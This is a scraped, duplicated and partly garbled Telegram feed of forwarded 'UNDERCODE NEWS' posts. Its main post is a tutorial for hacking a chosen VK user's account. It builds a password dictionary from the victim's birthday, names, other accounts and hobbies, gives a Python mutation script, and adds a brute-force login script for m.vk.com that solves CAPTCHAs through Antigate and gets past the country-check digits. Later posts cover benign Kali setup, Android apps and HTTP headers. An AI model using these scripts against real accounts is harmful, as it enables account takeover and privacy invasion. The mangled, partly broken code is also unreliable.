Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦"Smart" brute force hack any Vk user !
A method designed for average users. For him, we will need a special dictionary tailored for a specific person. Let's figure out the structure of our dictionary:
Personal data. This includes the date of birth (11/17/1992 = 1711, 1992, 17111992), age (1992, 2017 = 2017, 1992, 24), first name (Stas = stas, ctac) and last name (Ivanov = ivanov).
Accounts from other social. networks and mail services (twitter.com/stasik_ku, facebook.com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
Hobbies (football, swimming, youth = football, swimming, molodejka, molodegka).
There is also a VK page, which says which passwords should be specified, which characters are possible and the most common passwords.
The result is a sheet of 14 lines. But we still need to create password combinations from it that our victim could create.
I present to you my small python script that does this.
#! coding:utf-8 import sys,os
razdel = ['_',':',';']
def uniq(seq): seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
def brute_words(words): new_words = []
for i in words: new_words.append(i)
new_words.append(i[0].upper() + i[1:])
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper())
new_words.append(i.upper())
for j in spisok: new_words.append(i + j)
for m in razdel: new_words.append(j + m + i)
new_words.append(j + i)
new_words.append(i * 2 + j)
new_words.append(j * 2 + i)
new_words.append(i[0].upper() + i[1:] + j)
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j)
return uniq(new_words)
def generate(words_file): o = open(words_file, 'r')
words = o.read().splitlines()for i in brute_words(words): print(i)
def main(): try: argv1 = sys.argv[1]
generate(argv1)
except IndexError: print("ΠΡΠΆΠ½ΠΎ ΡΠΊΠ°Π·Π°ΡΡ ΡΠ°ΠΉΠ»")
except IOError: print("ΠΠ΅Ρ ΡΠ°ΠΊΠΎΠ³ΠΎ ΡΠ°ΠΉΠ»Π°")if name == "main": main()
Out of 14, 1272 options were obtained. Let me give you a part.
Molodegkactac
MolodegkActac
molodejka_molodegka
Stasss92molodejka
stasss92molodegka
molodegka_stasss92
molodegka:stasss92
molodegka;stasss92
stasss1992swimming
swimming_stasss1992
Kurayginctac
KuraygiNctac
kurayginkuraygin
kuraygin_kuraygin
molodegka171119921711199217111992molodegka
molodegkamolodegka1711199224 1711_24
Great, now we will automate the search for passwords through the mobile version of VK with a small script.
π¦"Smart" brute force hack any Vk user !
A method designed for average users. For him, we will need a special dictionary tailored for a specific person. Let's figure out the structure of our dictionary:
Personal data. This includes the date of birth (11/17/1992 = 1711, 1992, 17111992), age (1992, 2017 = 2017, 1992, 24), first name (Stas = stas, ctac) and last name (Ivanov = ivanov).
Accounts from other social. networks and mail services (twitter.com/stasik_ku, facebook.com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
Hobbies (football, swimming, youth = football, swimming, molodejka, molodegka).
There is also a VK page, which says which passwords should be specified, which characters are possible and the most common passwords.
The result is a sheet of 14 lines. But we still need to create password combinations from it that our victim could create.
I present to you my small python script that does this.
#! coding:utf-8 import sys,os
razdel = ['_',':',';']
def uniq(seq): seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
def brute_words(words): new_words = []
for i in words: new_words.append(i)
new_words.append(i[0].upper() + i[1:])
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper())
new_words.append(i.upper())
for j in spisok: new_words.append(i + j)
for m in razdel: new_words.append(j + m + i)
new_words.append(j + i)
new_words.append(i * 2 + j)
new_words.append(j * 2 + i)
new_words.append(i[0].upper() + i[1:] + j)
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j)
return uniq(new_words)
def generate(words_file): o = open(words_file, 'r')
words = o.read().splitlines()for i in brute_words(words): print(i)
def main(): try: argv1 = sys.argv[1]
generate(argv1)
except IndexError: print("ΠΡΠΆΠ½ΠΎ ΡΠΊΠ°Π·Π°ΡΡ ΡΠ°ΠΉΠ»")
except IOError: print("ΠΠ΅Ρ ΡΠ°ΠΊΠΎΠ³ΠΎ ΡΠ°ΠΉΠ»Π°")if name == "main": main()
Out of 14, 1272 options were obtained. Let me give you a part.
Molodegkactac
MolodegkActac
molodejka_molodegka
Stasss92molodejka
stasss92molodegka
molodegka_stasss92
molodegka:stasss92
molodegka;stasss92
stasss1992swimming
swimming_stasss1992
Kurayginctac
KuraygiNctac
kurayginkuraygin
kuraygin_kuraygin
molodegka171119921711199217111992molodegka
molodegkamolodegka1711199224 1711_24
Great, now we will automate the search for passwords through the mobile version of VK with a small script.
"Smart" brute force hack any Vk user ! partβ-2
#! coding: utf8
import grab, re, urllib2from antigate import AntiGatefrom grab import GrabTimeoutErrorfrom time import sleep
cap_key = '123 '
def anti(key, file): Captcha Ρ Antigate
try:
try: data = AntiGate(key, file)
return data
except KeyboardInterrupt:
print("name")
except:
anti(key, file)
def save(url, file): #L
site = urllib2.urlopen(url)
f = open(file, 'wb')
f.write(site.read())
def cap_solve(img):
save(img, 'captcha.jpg')
key = anti(cap_key, 'captcha.jpg')
return keydef brute(login, passwords, save):
out = open(save, 'w')
psswrds = open(passwords,'r')
try:
int(login)
prefix = True
except:
prefix = False
g = grab.Grab()
g.go('http://m.vk.com')
for line in psswrds:
psswrd = line.rstrip('\r\n')
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.submit()
if g.doc.text_search(u'captcha'):
all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
captcha = '' + all_captchas
key = cap_solve(captcha)
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.set_input('captcha_key', str(key))
g.doc.submit()
print("cap")
if 'ΠΠΎΠ΄ΡΠ²Π΅ΡΠ΄ΠΈΡΡ' in g.response.body:
if prefix:
prefix1 = g.doc.rex_search('\+[0-9]*').group(0)
prefix2 = g.doc.rex_search(' [0-9]*').group(0)
pre1 = re.findall('[0-9]{1,}', prefix1)[0]
pre2 = re.findall('[0-9]{1,}', prefix2)[0]
login = login.replace(pre1, '')
login = login.replace(pre2, '')
g.set_input('code', login)
g.submit()
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
else:
out.write(login + ':' + psswrd + '\n')
else:
if g.doc.rex_search('[^>]+').group(0) == 'Login | VK':
print(login + ':' + psswrd + '--fail')
else:
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
out.close()
psswrds.close()
Naturally, the example is not optimized. You can also add proxies, multithreading and other goodies, but you will do it yourself if it is interesting. But the script is able to enter the missing digits in VKontakte protection itself when entering from another country, and also, using Antigate, easily enters Captch'i that appear after 5-6 attempts to enter from one IP.
β β β Uππ»βΊπ«Δπ¬πβ β β β
#! coding: utf8
import grab, re, urllib2from antigate import AntiGatefrom grab import GrabTimeoutErrorfrom time import sleep
cap_key = '123 '
def anti(key, file): Captcha Ρ Antigate
try:
try: data = AntiGate(key, file)
return data
except KeyboardInterrupt:
print("name")
except:
anti(key, file)
def save(url, file): #L
site = urllib2.urlopen(url)
f = open(file, 'wb')
f.write(site.read())
def cap_solve(img):
save(img, 'captcha.jpg')
key = anti(cap_key, 'captcha.jpg')
return keydef brute(login, passwords, save):
out = open(save, 'w')
psswrds = open(passwords,'r')
try:
int(login)
prefix = True
except:
prefix = False
g = grab.Grab()
g.go('http://m.vk.com')
for line in psswrds:
psswrd = line.rstrip('\r\n')
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.submit()
if g.doc.text_search(u'captcha'):
all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
captcha = '' + all_captchas
key = cap_solve(captcha)
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.set_input('captcha_key', str(key))
g.doc.submit()
print("cap")
if 'ΠΠΎΠ΄ΡΠ²Π΅ΡΠ΄ΠΈΡΡ' in g.response.body:
if prefix:
prefix1 = g.doc.rex_search('\+[0-9]*').group(0)
prefix2 = g.doc.rex_search(' [0-9]*').group(0)
pre1 = re.findall('[0-9]{1,}', prefix1)[0]
pre2 = re.findall('[0-9]{1,}', prefix2)[0]
login = login.replace(pre1, '')
login = login.replace(pre2, '')
g.set_input('code', login)
g.submit()
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
else:
out.write(login + ':' + psswrd + '\n')
else:
if g.doc.rex_search('[^>]+').group(0) == 'Login | VK':
print(login + ':' + psswrd + '--fail')
else:
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
out.close()
psswrds.close()
Naturally, the example is not optimized. You can also add proxies, multithreading and other goodies, but you will do it yourself if it is interesting. But the script is able to enter the missing digits in VKontakte protection itself when entering from another country, and also, using Antigate, easily enters Captch'i that appear after 5-6 attempts to enter from one IP.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Vk
VK | Welcome!
VK is the largest European social network with more than 100 million active users. Our goal is to keep old friends, ex-classmates, neighbors and colleagues in touch.
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π GUI software installers in Kali Linux:
1) Open a terminal and enter the following commands to install the Software Center in Kali.
$ sudo apt update
$ sudo apt install gnome-software
2) After the installation is complete, you will need to use vi or your favorite text editor to edit the /etc/apt/sources.list file for the application to work .
3) Add the following lines to the file.
$ sudo vi /etc/apt/sources.list
deb http://kali.download/kali/ kali-rolling main non-free contrib
deb http://ftp.debian.org/debian stable main contrib non-free
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb http://http.kali.org/kali kali-last-snapshot main non-free contrib
deb http://http.kali.org/kali kali-experimental main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
4) To open the Application Center, run the gnome-software command from a terminal.
Installing Synaptic
5) Open a terminal and enter the following commands to install Synaptic in Kali.
$ sudo apt update
$ sudo apt install synaptic
6) After the installation is complete, use a search similar to the Application Center or run:
$ synaptic
7) Now you can search for and install new applications or remove existing ones from your system.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π GUI software installers in Kali Linux:
1) Open a terminal and enter the following commands to install the Software Center in Kali.
$ sudo apt update
$ sudo apt install gnome-software
2) After the installation is complete, you will need to use vi or your favorite text editor to edit the /etc/apt/sources.list file for the application to work .
3) Add the following lines to the file.
$ sudo vi /etc/apt/sources.list
deb http://kali.download/kali/ kali-rolling main non-free contrib
deb http://ftp.debian.org/debian stable main contrib non-free
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb http://http.kali.org/kali kali-last-snapshot main non-free contrib
deb http://http.kali.org/kali kali-experimental main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
4) To open the Application Center, run the gnome-software command from a terminal.
Installing Synaptic
5) Open a terminal and enter the following commands to install Synaptic in Kali.
$ sudo apt update
$ sudo apt install synaptic
6) After the installation is complete, use a search similar to the Application Center or run:
$ synaptic
7) Now you can search for and install new applications or remove existing ones from your system.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
iCloud windows application should be updated now ! new critical vulnerability has been patched.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦best apps to capture intruder photos on your Android device:
https://apkpure.com/third-eye-find-who-tries-to-access-your-mobile/com.miragestacks.thirdeye
https://play.google.com/store/apps/details?id=com.harteg.crookcatcher&hl=en&gl=US
https://play.google.com/store/apps/details?id=com.bloketech.lockwatch&utm_source=www.apk4fun.com
https://play.google.com/store/apps/details?id=org.twinone.intruderselfie&hl=en&gl=US
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦best apps to capture intruder photos on your Android device:
https://apkpure.com/third-eye-find-who-tries-to-access-your-mobile/com.miragestacks.thirdeye
https://play.google.com/store/apps/details?id=com.harteg.crookcatcher&hl=en&gl=US
https://play.google.com/store/apps/details?id=com.bloketech.lockwatch&utm_source=www.apk4fun.com
https://play.google.com/store/apps/details?id=org.twinone.intruderselfie&hl=en&gl=US
β β β Uππ»βΊπ«Δπ¬πβ β β β
APKPure.com
Third Eye for Android - APK Download
Download Third Eye apk 1.3.4 for Android. Find who tries to access your mobile. Catch your friends & family red handed.
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to view HTTP headers in any website :
How to see HTTP headers in a web browser
1) This is the easiest method available on any operating system.
Press F12 in your web browser and open the page of interest.
2) Go to the Network tab and select the connection you are interested in.
Google Chrome / Chromium:
3) The Response Headers come first , and then the Request Headers , although of course the request and its headers are sent first, and then the response comes.
4) This is a convenient method, and you do not need to worry about the HTTPS protocol - since the web browser is the final destination, it can show the already decrypted data.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to view HTTP headers in any website :
How to see HTTP headers in a web browser
1) This is the easiest method available on any operating system.
Press F12 in your web browser and open the page of interest.
2) Go to the Network tab and select the connection you are interested in.
Google Chrome / Chromium:
3) The Response Headers come first , and then the Request Headers , although of course the request and its headers are sent first, and then the response comes.
4) This is a convenient method, and you do not need to worry about the HTTPS protocol - since the web browser is the final destination, it can show the already decrypted data.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
